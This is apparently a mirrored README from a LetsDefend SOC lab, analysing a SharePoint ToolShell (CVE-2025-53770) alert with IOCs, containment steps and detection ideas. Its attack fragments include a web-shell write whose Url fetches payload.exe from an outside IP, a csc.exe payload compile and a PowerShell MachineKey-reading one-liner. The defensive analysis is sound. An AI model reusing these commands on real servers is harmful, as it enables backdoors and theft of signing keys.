Associated Vulnerability
Title:Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)Description:Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Readme
# 🧠 LetsDefend SharePoint Zero-Day Analysis (ToolShell - SOC342-CVE-2025-53770)
## 📘 Introduction
I investigated a SharePoint zero-day called **ToolShell (CVE-2025-53770)** in the **LetsDefend** cyber lab.
The exercise mimicked a **real-world zero-day RCE attack** where a malicious POST request bypassed authentication, executed PowerShell to steal *MachineKeySection* keys, compiled `payload.exe`, and dropped a malicious web shell (`spinstall0.aspx`).
This README documents the **attack process, forensic steps, containment actions**, and **lessons learned**.
---
## ⚙️ Lab Overview
| Field | Details |
|-------|----------|
| **Platform** | LetsDefend Cyber Range |
| **Target** | SharePoint Server (`SharePoint01`) |
| **CVE** | CVE-2025-53770 |
| **Objective** | Analyze RCE, practice detection & containment |
| **Tools Used** | Windows PowerShell, VirusTotal, AbuseIPDB, Talosintelligence, LetsDefend Log Management, LetsDefend Endpoint Security, Base64 Decoder, LetsDefend Threat Intel |
---
## 🚨 The Alert
A **critical alert** flagged suspicious activity targeting `ToolPane.aspx` in SharePoint with a large payload and spoofed *Referer*.
This correlates with **CVE-2025-53770**, a zero-day vulnerability allowing **unauthenticated RCE** via crafted POST requests.
## 🚨 Alert Breakdown — SOC342: CVE-2025-53770 SharePoint ToolShell Auth Bypass & RCE
---
### 🔴 **Critical**
**What it is:** The severity level assigned to this alert — highest and most urgent.
**Why it matters:** Indicates this event could lead to **full system compromise (RCE)**. Treat as **top-priority**: isolate and investigate immediately.
---
### 🕒 **Jul 22, 2025 — 01:07 PM**
**What it is:** The timestamp when the alert was triggered.
**Why it matters:** Use it to **locate logs**, correlate related events, and **build a timeline** (search ± few minutes or hours).
---
### ⭐ **SOC342 — CVE-2025-53770 SharePoint ToolShell Auth Bypass and RCE (Rule)**
**What it is:** The **detection rule or signature** that fired, describing the matched condition (ToolShell exploit attempt).
**Why it matters:** Identifies **what attack pattern** was detected — useful for hunting similar cases (e.g., unauthenticated POSTs to admin pages or potential webshell uploads).
---
### 🧩 **320 (EventID)**
**What it is:** Numeric identifier for this specific alert instance or rule (vendor-defined).
**Why it matters:** Helps with **tracking**, filtering, and referencing this alert in tickets or reports.
---
### 🌐 **Web Attack (Category)**
**What it is:** High-level classification — this alert targets **web infrastructure**.
**Why it matters:** Routes incident to the **web/SharePoint/infra** team and applies **web-specific playbooks**.
---
### 👤 **Level: Security Analyst**
**What it is:** Analyst role or escalation level expected to handle the alert.
**Why it matters:** Indicates this is **not a Tier-1** alert — requires a **Security Analyst** (experienced responder) for immediate action.
---
### 🖥️ **Hostname: SharePoint01**
**What it is:** Name of the affected host (target or origin of the activity).
**Why it matters:** This is the **primary containment target** — isolate, collect evidence, and monitor this system first.
---
### 🌍 **Source IP Address: 107.191.58.76**
**What it is:** The IP sending the suspicious request (attacker or proxy).
**Why it matters:** **Block** it at the firewall/WAF, **search** for other hits from it, and check ownership/geo info. Note: IPs can be **spoofed** or part of **botnets**.
---
### 🧭 **Destination IP Address: 172.16.20.17**
**What it is:** The internal target IP (SharePoint01).
**Why it matters:** Confirms which internal system was targeted — map it to hostname and **review internal access paths/firewall rules**.
---
### 📬 **HTTP Request Method: POST**
**What it is:** The HTTP verb used — client sent data to the server.
**Why it matters:** **POSTs to admin endpoints** are suspicious when unauthenticated or large — they can carry **exploit payloads or webshells**.
---
### 📎 **Requested URL:**
`/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx`
**What it is:** The exact targeted web path and parameters.
**Why it matters:** This is a **SharePoint admin/layout endpoint** — commonly abused by attackers for **auth bypass or code uploads**. Hunt for other requests to the same path.
---
### 🧠 **User-Agent:**
`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0`
**What it is:** The browser string reported by the client.
**Why it matters:** Often **spoofed** by attackers to look legitimate — can help **filter logs**, but **don’t rely on it for attribution**.
---
### 🔗 **Referer:**
`/_layouts/SignOut.aspx`
**What it is:** HTTP header claiming the request came from SharePoint’s sign-out page.
**Why it matters:** **Spoofed referers** are suspicious — may be used to **bypass checks or mimic normal traffic**. Compare with legitimate navigation flows.
---
### 📦 **Content-Length:** `7699`
**What it is:** Size of the HTTP request body (in bytes).
**Why it matters:** A **large POST body** to an admin endpoint suggests a **serialized exploit or file upload**. Look for other POSTs of similar size to same URL.
---
### ⚠️ **Alert Trigger Reason**
**Text:** Suspicious unauthenticated POST request targeting `ToolPane.aspx` with large payload size and spoofed referer — indicative of **CVE-2025-53770** exploitation.
**What it is:** Rule explanation summarizing the matched behavior.
**Why it matters:** Describes **exactly why** the alert fired — verify whether the request was unauthenticated, what payload was sent, and if it matches known exploit patterns.
---
### 🚧 **Device Action: Allowed**
**What it is:** Indicates the **protecting device’s response** (e.g., WAF/firewall).
**Why it matters:** Since it was **allowed**, the **attack reached the host** — treat as potential compromise.
**Immediate actions:**
- **Block source IP** (`107.191.58.76`)
- Enable blocking rules
- Investigate destination host (`SharePoint01`)
- **Tune WAF/firewall** to block future requests with similar patterns.
---
**🔎 Summary:**
This alert reflects an unauthenticated exploit attempt exploiting **ToolPane.aspx** (SharePoint RCE CVE-2025-53770). The POST request contained a large payload and spoofed referer, consistent with **ToolShell zero-day exploitation behavior**. Because the device allowed the request, assume **possible compromise** until proven otherwise. 🟥 **Severity:** Critical
---
## Quick checks (1–3 minutes)
1. **Search IIS/WAF for POSTs to ToolPane.aspx** (around `2025-07-22 13:07`):
`Select-String -Path "C:\inetpub\logs\LogFiles\**\*.log" -Pattern "/_layouts/15/ToolPane.aspx" | Out-File .\IIS_ToolPane_hits.txt`
2. **Pull full POST body** from WAF/proxy or packet capture and save to forensic share.
3. **Look for new/modified ASPX in webroot** (webshells):
`Get-ChildItem "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\**\*.aspx" -Recurse | Sort LastWriteTime -Desc | Select FullName,LastWriteTime`
4. **Block attacker & isolate host**: block `107.191.58.76` at perimeter/WAF and move `SharePoint01` to quarantine (or restrict egress).
> **Do not delete** suspected files — make forensic copies first.
## 🧩 What is SharePoint?
**Microsoft SharePoint** is a collaboration and document management platform.
It provides secure file storage, version control, and intranet portals, integrated with **Active Directory, Teams, Outlook, and Power BI.**
### 🔐 Security Considerations
- Uses AD/SSO for authentication
- Data encryption at rest & in transit
- Web parts and layouts can be abused if misconfigured
- Requires regular patching to defend against zero-days
---
## 🧨 CVE-2025-53770 (ToolShell)
A **critical unauthenticated RCE** vulnerability in **Microsoft SharePoint Server** exploiting insecure deserialization.
Attackers use it to:
- Execute code remotely
- Exfiltrate MachineKey material
- Deploy web shells for persistence
🧮 **CVSS Score:** 9.8 (Critical)
📡 **Exploitation:** Active in the wild
---
## 🧠 Attack Analysis with VirusTotal
**Source IP:** `107.191.58.76`
🧩 **Result:** 15/95 security vendors flagged it as malicious.
### 🌍 IP Location & Reputation
Checked via **AbuseIPDB** — IP linked to:
- Hacking and brute-force attempts
- Web app attacks
- Port scanning
- DNS poisoning
### 🌐 Talos IP Reputation
Checked via **Talos Intelligence** — IP/subnet characteristics:
- Hosted by **Vultr (cloud provider)**
- Hostnames in the range: `*.vultrusercontent.com`
- Forward/reverse DNS mostly **not matched**
- Email reputation: Mostly **Neutral**, some **Poor**
- Minimal email volume (0–0.6 per day/month)
- Indicates occasional misuse, supporting **malicious activity context**
---
## 🖥️ Endpoint Analysis
Located host **SharePoint01** in Endpoint Security.
Examined **Terminal History** for suspicious commands.
This log shows that at 13:07:11, a PowerShell process ran under the SharePoint application pool, executing a Base64-encoded command. The parent process was services.exe, and the attack targeted SharePoint directories. This is a clear indicator of ToolShell exploitation and remote code execution within the SharePoint server.
---
## 🧾 PowerShell Findings
### What the PowerShell command options mean
- `-nop` = `-NoProfile`: start PowerShell **without loading the user profile** (avoids profile-based detection, runs faster).
- `-w hidden` = `-WindowStyle Hidden`: run **without showing a window** (stealth).
- `-e` = `-EncodedCommand`: the following string is **Base64-encoded** PowerShell content (usually UTF-16LE or sometimes UTF-8) — used to hide code from casual inspection and simple logs.
- `<BASE64>`: long Base64 payload — when decoded it contains an **ASPX server script** (looks like a webshell) that reads `MachineKey` values.
## Command Line Findings with Base64 Decoder:
⚙️ Behavior Summary
- Uses reflection to load System.Web assembly
- Accesses MachineKeySection non-public method
- Reads ValidationKey & DecryptionKey
- Writes results to HTTP response → exfiltration
This indicates MachineKey theft for forging ViewState/auth tokens — classic ToolShell exploitation.
### Command 1 — C# Compilation:
🧩 Finding: Attacker compiled payload.cs into payload.exe using built-in .NET compiler → likely malware.
**What this literally does (step‑by‑step):**
- Runs the program `csc.exe` → the **C# compiler** that ships with the .NET Framework.
- `/out:C:\Windows\Temp\payload.exe` → tells the compiler **where to save the compiled program** and what to name it (`payload.exe`).
- `C:\Windows\Temp\payload.cs` → the **C# source file** (human‑readable code) that the compiler turns into a runnable program.
**Why this is dangerous (novice explanation):**
- The attacker converted text code (`.cs`) into an executable (`.exe`) on the victim machine.
- The binary (`payload.exe`) can perform any actions the attacker programmed: open network connections, spawn shells, install persistence, or steal data.
- Using the built‑in compiler helps attackers avoid dropping obvious malicious binaries and can bypass script‑only monitoring.
**How the attacker likely used it in the attack chain:**
- After achieving code execution via the web exploit, the attacker created or uploaded `payload.cs`.
- They compiled it into `payload.exe` so it could run as a native program on the server.
- The compiled payload was then used to carry out follow‑on actions (beaconing, backdoors, lateral movement).
**Evidence to look for (what to search in logs / files):**
- Process creation events for `csc.exe` with arguments pointing to `payload.cs` or `/out:C:\Windows\Temp\payload.exe`.
- Existence of `C:\Windows\Temp\payload.cs` and `C:\Windows\Temp\payload.exe` (collect forensic copies and compute hashes).
- Parent/child process relationships showing `w3wp.exe` / `powershell.exe` / `cmd.exe` spawning `csc.exe`.
- Network activity or process activity originating from `payload.exe` if it executed.
**One-line summary (for README / ticket):**
`Attacker used the .NET C# compiler (csc.exe) to compile payload.cs into payload.exe on the host — creating a native executable for follow‑on malicious activity.`
---
### Command 2 — Web Shell Deployment:
🧩 Finding:Created spinstall0.aspx inside SharePoint’s LAYOUTS directory → web-accessible backdoor.
**What this literally does (step‑by‑step, plain English):**
- Runs `cmd.exe /c` → starts the Windows command shell to run a single command and then exit.
- `echo <...> > "...\spinstall0.aspx"` → prints the provided HTML/ASPX text and **writes it into the file** `spinstall0.aspx` (the `>` operator creates or overwrites the file).
- The written content includes `runat="server"` → makes the file **server‑side ASPX**, so IIS/SharePoint executes it inside the web application process rather than serving it as static text.
- The `<object>` element contains `Url="http://107.191.58.76/payload.exe"` → instructs the page (or server when executed) to fetch the attacker’s `payload.exe` from the remote host.
**Why this is dangerous (novice explanation):**
- The attacker created a **server‑side page** in a web‑accessible SharePoint folder; because it runs on the server, it can perform actions with the web app’s privileges.
- The page can instruct the server to **download and run** the attacker’s payload, enabling remote code execution and persistence.
- A file in the webroot is easy to trigger via HTTP requests, allowing remote re‑use without additional uploads.
**How the attacker likely used it in the attack chain:**
- After initial code execution via the ToolPane.aspx exploit, the attacker wrote `spinstall0.aspx` into the SharePoint `LAYOUTS` folder.
- The web shell is triggered by visiting the page or invoked by application code, causing the server to fetch `payload.exe` from the attacker host.
- The fetched payload is then executed or staged, providing a persistent backdoor for the attacker.
**Evidence to look for (what to search in logs / files):**
- File present at:
`C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx` — collect a forensic copy and compute SHA256.
- File creation/write events (Sysmon EventID 11 or Windows Audit 4663) showing `cmd.exe` writing to that path.
- IIS logs showing requests to `spinstall0.aspx` or outgoing requests to `http://107.191.58.76/payload.exe`.
- Process creation or network activity immediately after accesses to `spinstall0.aspx` (indicating payload download/execution).
- Other suspicious ASPX files in SharePoint LAYOUTS with similar content or names.
**One-line summary (for README / ticket):**
`Attacker created a server‑side ASPX web shell (spinstall0.aspx) in SharePoint’s LAYOUTS folder that instructs the server to fetch/run payload.exe from attacker infrastructure — persistent remote backdoor.`
### Command 3 — MachineKey Exfiltration:
🧩 Finding: Executed PowerShell to read and exfiltrate MachineKey configuration — direct RCE precondition.
**What this literally does (step‑by‑step):**
- Runs `powershell.exe` → the Windows scripting shell.
- `-Command` tells PowerShell to execute the following expression.
- `[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()` calls into .NET to retrieve the ASP.NET **machineKey** configuration object (includes `ValidationKey`, `DecryptionKey`, and related settings).
- In short: the attacker asked .NET (via PowerShell) to return the web app’s secret machineKey values.
**Why this is dangerous (novice explanation):**
- The `machineKey` holds secrets that ASP.NET uses to:
- Sign and validate `ViewState` and forms‑auth cookies.
- Encrypt/decrypt sensitive web tokens.
- If an attacker obtains `ValidationKey`/`DecryptionKey`, they can:
- Forge signed `ViewState` or auth cookies, or decrypt tokens.
- Make the server accept forged requests → **bypass authentication**, enable RCE or privilege escalation.
**How the attacker likely used it in the attack chain:**
- Exploit `ToolPane.aspx` to run code inside the SharePoint app process.
- Execute this PowerShell command (or an ASPX that does the same) to read the machineKey.
- Capture `ValidationKey` / `DecryptionKey`.
- Use keys to craft signed payloads (e.g., malicious `ViewState`) or valid auth cookies to escalate access.
**Evidence to look for (what to search in logs / files):**
- Process creation events showing `powershell.exe` with `GetApplicationConfig` or `MachineKeySection` in the command line.
- Web responses, logs, or saved files containing long hex strings (likely `ValidationKey` / `DecryptionKey`).
- ASPX pages or webshells that call `MachineKeySection` / `GetApplicationConfig`.
- Unusual activity by the web app pool user (e.g., `IIS APPPOOL\SharePoint`) at same timestamps.
**One-line summary (for README / ticket):**
`Attacker executed PowerShell to call System.Web.Configuration.MachineKeySection::GetApplicationConfig() — attempting to exfiltrate ASP.NET machineKey (ValidationKey/DecryptionKey), enabling token forgery and authentication bypass.`
## 🔍 Threat Intelligence Findings
**Source:** LetsDefend Threat Intel (queried by IP `107.191.58.76`)
- Tagged with **CVE‑2025‑53770** and observed `Referer: /_layouts/SignOut.aspx`.
**Interpretation:** The attacker likely spoofed legitimate SharePoint sign‑out traffic to mask malicious POST requests. Containment was initiated immediately.
---
## 🧩 Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|--------|----------------------------------------------------------------|------------------------------------------------|
| IP | `107.191.58.76` | Attacker source IP sending exploit POST |
| URL | `/_layouts/15/ToolPane.aspx?DisplayMode=Edit` | Exploit endpoint |
| File | `spinstall0.aspx` | Deployed malicious ASPX web shell |
| String | `MachineKeySection` | Evidence of machineKey exfiltration attempt |
---
## 🧾 Analyst Note (SOC-342)
- **Date/Time:** 2025-07-22 13:07
- **Case ID:** SOC-342
- **Host:** SharePoint01
- **Severity:** 🔴 Critical
- **Analyst:** `Victor`
### 📋 Summary
Detected **ToolShell** zero‑day exploitation (CVE‑2025‑53770) against on‑prem SharePoint (`SharePoint01`). The attacker (IP `107.191.58.76`) bypassed authentication and performed multiple post‑exploit actions:
- Uploaded `spinstall0.aspx` (web shell) to the SharePoint LAYOUTS directory.
- Compiled `payload.exe` locally using the .NET C# compiler.
- Executed PowerShell to read/exfiltrate ASP.NET **MachineKey** values.
**Conclusion:** Confirmed compromise — web‑shell deployment, key exfiltration, and on‑host payload compilation.
---
## 🧰 Containment & Remediation
### ✅ Recommended Actions
- **Contain:** Isolate `SharePoint01` (quarantine VLAN) or block attacker IPs at perimeter/WAF/firewall.
- **Hunt:** Search all SharePoint servers for `spinstall*.aspx`, `payload.exe` (by filename/hash), and `GetApplicationConfig`/`MachineKeySection` usage.
- **Eradicate:** Remove `spinstall0.aspx`, unauthorized scheduled tasks/services, and any detected malware (after collecting forensic copies).
- **Mitigate:** Rotate ASP.NET `machineKey` values (coordinate with app owners) and apply Microsoft **July 2025 emergency patches** to all on‑prem SharePoint instances.
- **Detect & Prevent:**
- Add detections for encoded PowerShell (`-EncodedCommand` / `-e`) on web servers.
- Alert on `csc.exe` usage compiling code in `C:\Windows\Temp` on web hosts.
- Block unauthenticated large `POST` to ToolPane.aspx via WAF rules.
---
## 📚 Lessons Learned
- Zero‑day exploits commonly chain stages: **RCE → persistence → exfiltration**.
- **MachineKey exfiltration** is a high‑risk indicator for SharePoint attacks — treat any attempt as critical.
- Built‑in system binaries (`csc.exe`, `cmd.exe`, `powershell.exe`) are frequently abused post‑exploit; monitor for unexpected usage on web servers.
- Rapid detection, containment, and forensic preservation are essential to limit impact.
---
## 📝 Quick responder checklist (summary)
1. Quarantine `SharePoint01` and block `107.191.58.76`.
2. Collect forensic copies of `spinstall0.aspx`, `payload.cs`, `payload.exe` (preserve timestamps).
3. Compute SHA256 hashes and submit to intel/EDR (if allowed).
4. Dump memory of `w3wp.exe` / `payload.exe` for analysis.
5. Hunt across infrastructure for the IOCs above.
6. Rotate `machineKey` and affected credentials **after** evidence collection.
7. Patch SharePoint immediately; consider host rebuild if persistence is confirmed.
---
File Snapshot
[4.0K] /data/pocs/f6b689c76ea7f842a07b10e1f08a479789589ea4
├── [4.0K] Lets defend
│ ├── [141K] Abus.jpg
│ ├── [162K] Alert.jpg
│ ├── [116K] Case.jpg
│ ├── [102K] Event.jpg
│ ├── [ 85K] Screenshot 2025-09-29 133717.jpg
│ ├── [172K] Screenshot 2025-09-29 135646.jpg
│ ├── [197K] Screenshot 2025-09-29 140024.jpg
│ ├── [116K] Screenshot 2025-09-29 140231.jpg
│ ├── [ 83K] Screenshot 2025-09-29 141241.jpg
│ ├── [110K] Screenshot 2025-09-29 141653.jpg
│ ├── [263K] Screenshot 2025-09-29 152735.jpg
│ ├── [ 78K] Screenshot 2025-09-29 153925.jpg
│ ├── [ 98K] Screenshot 2025-09-29 154319.jpg
│ ├── [ 83K] Screenshot 2025-09-29 154445.jpg
│ ├── [ 60K] Screenshot 2025-09-29 154857.jpg
│ ├── [264K] Screenshot 2025-09-29 155002.jpg
│ ├── [109K] Screenshot 2025-09-29 155029.jpg
│ ├── [135K] Screenshot 2025-09-29 155055.jpg
│ ├── [110K] Screenshot 2025-09-29 155122.jpg
│ ├── [ 82K] Screenshot 2025-10-04 131953.jpg
│ ├── [ 89K] Screenshot 2025-10-04 132038.jpg
│ ├── [103K] Screenshot 2025-10-04 132449.jpg
│ ├── [150K] Screenshot 2025-10-04 132608.jpg
│ └── [ 40K] Screenshot 2025-10-04 150722.jpg
└── [ 25K] README.md
2 directories, 25 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →